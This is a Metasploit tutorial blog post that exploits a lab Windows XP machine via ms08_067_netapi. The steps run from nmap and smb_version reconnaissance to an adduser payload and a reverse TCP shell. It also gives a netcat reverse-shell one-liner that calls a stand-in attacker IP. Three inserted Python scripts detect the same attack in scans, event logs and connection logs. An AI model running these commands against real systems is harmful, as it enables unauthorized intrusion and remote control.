Exploiting Windows XP using Metasploit Part-2

    Exploiting Windows XP using Metasploit





Note : 

Before we move on, I would recommend you go through this blog, which covers all the basics of Metasploit; it is kind of a prequel to this one.


That being said, we are going to exploit one particular vulnerability, ms08_067_netapi; to know more about the vulnerability, click here.

Though we know we are going to exploit a Windows XP machine, let's pretend that we have no idea what operating system the target machine is running, which gives us an experience close to a real-world pentest.

In the upcoming steps, if you have any trouble using the SMB scanner or exploiting the remote machine, you must add the file sharing option to the firewall exception rules on the target.

Hoping that you have gone through the prequel of this blog, let's move on.

To find out what operating systems the remote hosts are running:

Command : 

db_nmap -A <your subnet>

Fig : 1.0




In Fig : 1.0 we have performed an aggressive nmap scan, which is a combination of the nmap flags -O (operating system detection), -sV (version detection), -sC (script scanning) and --traceroute (traceroute).

And if we view the hosts and their services:

Fig : 1.1




Hooooo! In Fig : 1.1 we can see that someone in the network is using Windows XP!!



But doesn't using an aggressive scan make us more likely to get detected?

Yes, and that is why we've got another way to find out whether there are any Windows XP machines present in the network, and that is using the smb_version module.

Command : 

search auxiliary/scanner/smb

Fig : 1.2


In Fig : 1.2 we have selected the smb_version module.

Now look at the options and set them accordingly.

Fig : 1.3




In Fig : 1.3 we have set all the required options and are good to go.

Command : 

run (or exploit)

Fig : 1.4




In Fig : 1.4 we can see that the module found a host in our network running Windows XP.

We can also see that extra information has been added into the database as well!

Fig : 1.5



In Fig : 1.5 we can see the output of the services command, where detailed information has been added into the info column for the Windows XP machine (192.168.216.146). This doesn't mean the smb_version module got more info than the nmap aggressive scan, because the aggressive scan also shows this information; Metasploit just somehow fails to parse that information and put it into the database, so the aggressive scan works perfectly fine.
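Since Metasploit does not always carry the aggressive scan's OS details into its database, it helps to parse the scan output yourself. As an added example (not part of the original blog and not Metasploit's own db_nmap code), here is a small Python inventory script that parses the XML report nmap writes with `nmap -A -oX`, lists each host's open services and best OS match, and flags end-of-life Windows hosts such as the XP box found above. The XML document, the addresses other than 192.168.216.146, and the list of legacy OS markers are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed sample: a trimmed nmap XML report of the kind `nmap -A -oX` emits.
# Only 192.168.216.146 comes from the post; everything else is made up for this example.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -A -oX - 192.168.216.0/24">
  <host>
    <status state="up"/>
    <address addr="192.168.216.146" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="139"><state state="open"/>
        <service name="netbios-ssn" product="Microsoft Windows netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds" product="Microsoft Windows XP microsoft-ds"/></port>
    </ports>
    <os>
      <osmatch name="Microsoft Windows XP SP2 or SP3" accuracy="97"/>
    </os>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.168.216.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/></port>
    </ports>
    <os>
      <osmatch name="Linux 5.4 - 5.15" accuracy="95"/>
    </os>
  </host>
</nmaprun>
"""

# Substrings that mark an operating system Microsoft no longer patches (assumed list, extend as needed).
LEGACY_OS_MARKERS = ("windows xp", "windows 2000", "windows server 2003")


def parse_nmap_xml(xml_text):
    """Return one dict per host: ip, best OS match, its accuracy, and the open services."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        services = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            services.append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "name": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
            })
        # Keep the osmatch with the highest accuracy; nmap may list several.
        best = None
        for m in host.findall("os/osmatch"):
            acc = int(m.get("accuracy", "0"))
            if best is None or acc > best[1]:
                best = (m.get("name", ""), acc)
        hosts.append({
            "ip": addr_el.get("addr"),
            "os": best[0] if best else "",
            "os_accuracy": best[1] if best else 0,
            "services": services,
        })
    return hosts


def find_legacy_hosts(hosts):
    """IPs whose OS match or service banners name an end-of-life Windows version."""
    flagged = []
    for h in hosts:
        text = (h["os"] + " " + " ".join(s["product"] for s in h["services"])).lower()
        if any(marker in text for marker in LEGACY_OS_MARKERS):
            flagged.append(h["ip"])
    return flagged


if __name__ == "__main__":
    inventory = parse_nmap_xml(SAMPLE_NMAP_XML)
    for h in inventory:
        ports = ", ".join("%d/%s %s" % (s["port"], s["proto"], s["name"]) for s in h["services"])
        print("%s  %s (%d%%)  [%s]" % (h["ip"], h["os"], h["os_accuracy"], ports))
    print("legacy hosts:", find_legacy_hosts(inventory))
```

Run it against a real report with `nmap -A -oX scan.xml <subnet>` and `parse_nmap_xml(open("scan.xml").read())`; the service banner check matters because nmap's OS match can be missing when a firewall drops the probes while the SMB banner still says "Windows XP".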

Note : 

But when I searched for information about this smb_version module, what I found is:

Fingerprint and display version information about SMB servers. Protocol information and host operating system (if available) will be reported. Host operating system detection requires the remote server to support version 1 of the SMB protocol. Compression and encryption capability negotiation is only present in version 3.1.1.

So this means the target's SMB protocol has to meet the above requirements in order for us to get OS detection on the target, which isn't possible all the time and makes this unreliable. In that case it is recommended to use the nmap aggressive scan, but also add a flag to set the timing template to 0 or 1 for firewall detection evasion, which costs you patience and time instead.

Command :

nmap -A <your subnet> -T0

So we found a Windows XP machine; now let's get into the exploitation phase 🔥🔥, which many of you, like me, have been waiting for.

Command : 

search ms08

Fig : 1.6




In Fig : 1.6 we can see the exploit we wanted to use, so let's see more about it using the info command.

Command : 

info exploit/windows/smb/ms08_067_netapi

Fig : 1.7







Here in Fig : 1.7 we can see more information about the module: its CVE details at the end, and also the different versions the exploit works against!

To use the exploit : 

use exploit/windows/smb/ms08_067_netapi

Let's see the different options we've got in the exploit.

Command : 

show options

Fig : 1.8




Here in Fig : 1.8 we can see the RPORT option, which is set to 445. If you have a networking background and some knowledge of SMB you should already know what that means; for those who have no clue, SMB is a local file sharing service that runs on port 445, so it is set to 445 by default. We shall talk about the rest of the information later.

Fig : 1.9





In Fig : 1.9 we can see we have a Windows machine with port 445 open and the SMB service running on it.

So now set the value of RHOSTS to that particular target.

Command : 

set RHOSTS 192.168.216.146 (my windows xp ip)

and let's see the options again

Fig : 2.0




Now in Fig : 2.0 we can see that the exploit target is set to automatic targeting, which means the exploit is going to detect the target version automatically. This exploit works pretty well with the exploit target set to Automatic Targeting, but sometimes automatic targeting fails and then we have no option but to set the target manually. So let's see how to set the target manually.

Command :

show targets

Fig : 2.1




This command will show you the different targets available, each with an id parameter, and as we know that our version is Windows XP SP2 English, we can set the target accordingly.

To set the target 

Command :

set target 4 (which is Windows XP SP2 English (NX) in my case)

But as the automatic target works fine for this exploit, I am just going to leave it the way it is.

So do you think we are all set to go ?!

Nope, we aren't there yet.

We need to set the payload, which performs the action we want done on the target system.

Many people confuse an exploit with a payload, so let me clear it up for you.

An exploit is a piece of software that acts as a proof of concept: it takes advantage of a bug or vulnerability in order to cause unexpected behaviour on the target machine, such as gaining access or gaining privileged access. A payload is the custom code that you want to get executed on the target machine after exploiting it.

In Simple words

Exploits give you the ability to run your payload on the target machine, and payloads are things like keyloggers and reverse shells. So payloads are only considered when code execution is possible, and they are not taken into consideration for exploits like denial of service.

So now let's see the different payloads this exploit has...

Command : 

show payloads

Fig : 2.2



In Fig : 2.2 we can see all the different payloads that can be run with this exploit on the target machine, with a description of each as well.

So first let's exploit the target machine by adding a user on it, shall we :)

For this we shall set the payload to windows/adduser.

Command : 

set payload windows/adduser

Fig : 2.3


Fig : 2.4



In Fig : 2.4 I am not just showing off my Windows XP 😉 but I also want you to observe that as of now I only have one user on the machine, only one.....

Are you a big fan of the Windows XP power on and power off sounds like me 😳 (not me feeling embarrassed)

Here's the sound just for you to enjoy 😁




This sure brings back memories :)

Now is it time to exploit windows ?

I'm afraid you should hold on a second, my frienduuu... 🙃

Fig : 2.5



In Fig : 2.5, when I used the show options command after setting the payload, we can see the user account credentials which are going to be set when we exploit the remote Windows XP machine.

You can change the credentials like any other option; how to do it? You know, I know :)

And now finally you can use the exploit command.



Command : 

exploit

Fig : 2.6


Seems like our exploit has worked, but we never know until we look at the Windows XP machine, so let's go.

Fig : 2.7



There you goooo, you see? You see that, right!!!!
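From the defender's side, what just happened leaves a clear trace. Windows XP writes Security event 624 (User Account Created) when the account appears and 636 when it is added to a local group (Vista and later use 4720 and 4732), and the windows/adduser payload also puts the new user into the local Administrators group. The following Python check is added here as an example and is not part of the original post: it parses a constructed Security log export and flags accounts that were created by the computer account (i.e. from the SYSTEM context, not by a logged-on administrator) or added to Administrators within a minute of creation. The log lines, the host name XPVM, the times and the account names are made up for the example.

```python
import re
from datetime import datetime

# Constructed export of a Windows XP Security log (timestamp,event id,source,message).
# XP/2003 event ids used here: 528 logon, 592 process created, 624 user account created,
# 636 member added to a security-enabled local group (4720/4732 on Vista and later).
# The host name XPVM, the times and the account names are made up for this example.
SAMPLE_SECURITY_LOG = """\
2023-05-01 10:02:11,528,Security,Successful Logon: User Name: Administrator Logon Type: 2
2023-05-01 10:15:40,624,Security,User Account Created: New Account Name: metasploit Caller User Name: XPVM$ Caller Domain: WORKGROUP
2023-05-01 10:15:40,636,Security,Security Enabled Local Group Member Added: Member Name: XPVM\\metasploit Target Account Name: Administrators
2023-05-01 10:15:41,592,Security,A new process has been created: Image File Name: C:\\WINDOWS\\system32\\cmd.exe Creator Process ID: 1204
2023-05-01 11:00:03,624,Security,User Account Created: New Account Name: svc_backup Caller User Name: Administrator Caller Domain: XPVM
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+),(?P<eid>\d+),(?P<src>[^,]+),(?P<msg>.*)$")


def parse_events(text):
    """Turn the CSV-like export into dicts with a parsed timestamp and integer event id."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the whole analysis
        events.append({
            "ts": datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S"),
            "eid": int(m.group("eid")),
            "src": m.group("src"),
            "msg": m.group("msg"),
        })
    return events


def field(msg, label):
    """Pull 'Label: value' out of a flattened event message; the value ends at the next label."""
    m = re.search(re.escape(label) + r": (.*?)(?= [A-Z][A-Za-z ]*:|$)", msg)
    return m.group(1).strip() if m else ""


def detect_suspicious_account_creation(events, window_seconds=60):
    """Flag 624 events whose caller is the computer account or that are followed by a
    636 event adding the same account to Administrators within window_seconds."""
    findings = []
    for c in (e for e in events if e["eid"] == 624):
        account = field(c["msg"], "New Account Name")
        caller = field(c["msg"], "Caller User Name")
        reasons = []
        # Code running as SYSTEM (for example an exploited service) is logged as the
        # computer account, which ends in '$', not as an interactive user.
        if caller.endswith("$"):
            reasons.append("created from SYSTEM context (caller is the computer account)")
        for g in events:
            if g["eid"] != 636:
                continue
            delta = (g["ts"] - c["ts"]).total_seconds()
            member = field(g["msg"], "Member Name").split("\\")[-1]
            group = field(g["msg"], "Target Account Name")
            if 0 <= delta <= window_seconds and member.lower() == account.lower() \
                    and group.lower() == "administrators":
                reasons.append("added to Administrators %.0fs after creation" % delta)
        if reasons:
            findings.append({"account": account, "caller": caller,
                             "time": c["ts"].isoformat(), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_suspicious_account_creation(parse_events(SAMPLE_SECURITY_LOG)):
        print("%(time)s suspicious account %(account)r created by %(caller)r: %(reasons)s" % f)
```

The second account in the sample, created by a logged-on Administrator with no group change, is deliberately left unflagged so that the rule separates routine administration from what the payload does.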






Now let's try to get a reverse shell from the Windows XP machine.

Those who don't know what a reverse shell is, just hold on tight and listen to me :)

A reverse shell is the best type of shell access that an attacker would strive for....., let me give you some perspective about this so that you don't confuse it with other types of shell access. It's like when you sit idle and a girl comes and initiates the conversation :) . But then your phone rings and you wake up to reality after a long 8 hour sleep.


Well, there's the roast that you never asked for 🙂

Here the girl is the target and you are the attacker machine.

So in technical terms, using netcat it would be something like:

Command on your Linux machine (ip address 1.2.3.4) :

ncat -lvp 5555

Command on the target Linux machine :

ncat 1.2.3.4 -e /bin/bash 5555

So let's go get it now

Command : 

set payload windows/shell/reverse_tcp

Fig : 2.8



Command : 

show options

Fig : 2.9




In Fig : 2.9 we just need to set the RHOSTS option and we are good to go.

LHOST is just the IP address of your machine, and LPORT denotes the local port our PC should listen on, which is also the port the target machine connects back to.

Now set the RHOSTS value to the IP address of the Windows XP machine and then

Command : 

exploit -j

Fig : 3.0


In Fig : 3.0 we can see that we have successfully triggered the vulnerability and got a reverse shell back.

But where is it? I don't see it. Do you see it? I guess not....

So there is a session opened in the background, and we need to interact with the session so that we can get the shell.
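The direction of that connection is exactly what a network defender can look for: the target is hit on SMB and, seconds later, opens an outbound connection back to the same peer on whatever LPORT was chosen. As an added example (not from the original post), the Python below runs over a constructed connection log and flags that pattern: an inbound connection to port 445 on a host, followed within a short window by an outbound connection from that host to the same peer on a port that is not a normal service port, such as Metasploit's default LPORT of 4444. The log format, the peer address 192.168.216.130 and the port list are assumptions made for the example.

```python
import csv
import io
from datetime import datetime

# Constructed connection log (the kind a perimeter or host firewall exports).
# Only 192.168.216.146 (the XP machine) comes from the post; the rest is made up.
SAMPLE_CONN_LOG = """\
timestamp,direction,src_ip,src_port,dst_ip,dst_port,proto
2023-05-01 10:20:01,in,192.168.216.130,49211,192.168.216.146,445,tcp
2023-05-01 10:20:02,out,192.168.216.146,1038,192.168.216.130,4444,tcp
2023-05-01 10:21:15,out,192.168.216.146,1039,192.168.216.2,53,udp
2023-05-01 10:30:44,in,192.168.216.10,50012,192.168.216.146,445,tcp
2023-05-01 10:31:00,out,192.168.216.146,1040,192.168.216.10,445,tcp
"""

# Ports a workstation legitimately talks to; outbound traffic elsewhere counts as unusual here.
# Assumed baseline for the example: tune it to your own environment.
COMMON_SERVICE_PORTS = {53, 80, 88, 135, 139, 389, 443, 445}


def parse_conn_log(text):
    """Parse the CSV log into dicts with a datetime and integer ports."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        events.append({
            "ts": datetime.strptime(row["timestamp"], "%Y-%m-%d %H:%M:%S"),
            "direction": row["direction"],
            "src_ip": row["src_ip"],
            "src_port": int(row["src_port"]),
            "dst_ip": row["dst_ip"],
            "dst_port": int(row["dst_port"]),
            "proto": row["proto"],
        })
    return events


def find_smb_callback_pattern(events, window_seconds=30):
    """Inbound SMB from peer P to host H, then H connects out to P on an unusual port."""
    findings = []
    inbound_smb = [e for e in events if e["direction"] == "in" and e["dst_port"] == 445]
    for smb in inbound_smb:
        victim, peer = smb["dst_ip"], smb["src_ip"]
        for e in events:
            if e["direction"] != "out" or e["src_ip"] != victim or e["dst_ip"] != peer:
                continue
            delta = (e["ts"] - smb["ts"]).total_seconds()
            if 0 <= delta <= window_seconds and e["dst_port"] not in COMMON_SERVICE_PORTS:
                findings.append({
                    "victim": victim,
                    "peer": peer,
                    "callback_port": e["dst_port"],
                    "seconds_after_smb": delta,
                })
    return findings


if __name__ == "__main__":
    for f in find_smb_callback_pattern(parse_conn_log(SAMPLE_CONN_LOG)):
        print("possible SMB exploit + reverse shell: %(victim)s -> %(peer)s:%(callback_port)d, "
              "%(seconds_after_smb).0fs after inbound SMB" % f)
```

The second SMB pair in the sample (a host that answers an inbound 445 connection with its own outbound 445 connection) is left unflagged on purpose: normal Windows file sharing is chatty in both directions on port 445, and it is the callback to a non-service port that distinguishes a reverse shell.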

To view the sessions 

Command : 

sessions

Fig : 3.1





Yes, that damn thing there! In Fig : 3.1 we can see the session created with its session id, and all we need to do is interact with the session.

To interact with the session :

Command : 

sessions -i <session-id>

Fig : 3.2





Why can't life always be this beautiful 🥹

In Fig : 3.2 we can see we are in, guys! And I also want you to know that we aren't some dummy user, we are the admin!! Because we can see the path we are at now, which is system32, where only an admin lands when he enters cmd.

So let's run some commands. To list files and directories : 

Command : 

dir

Fig : 3.3


Fig : 3.4


Fig : 3.5


So there we go guys! We made it :) In Fig : 3.3 we can see we can execute commands, and looking at Fig : 3.4 and Fig : 3.5 we can see that we can send files as well :))

So that's all for this blog, and this is just Part 2.

Heads up!! There's much more cool stuff ahead: we will be learning about meterpreter and msfvenom and also making Metasploit work over the internet, so I hope you have already tightened up your shoe laces ;)

So ya, this is it for now, and see you in no time :)


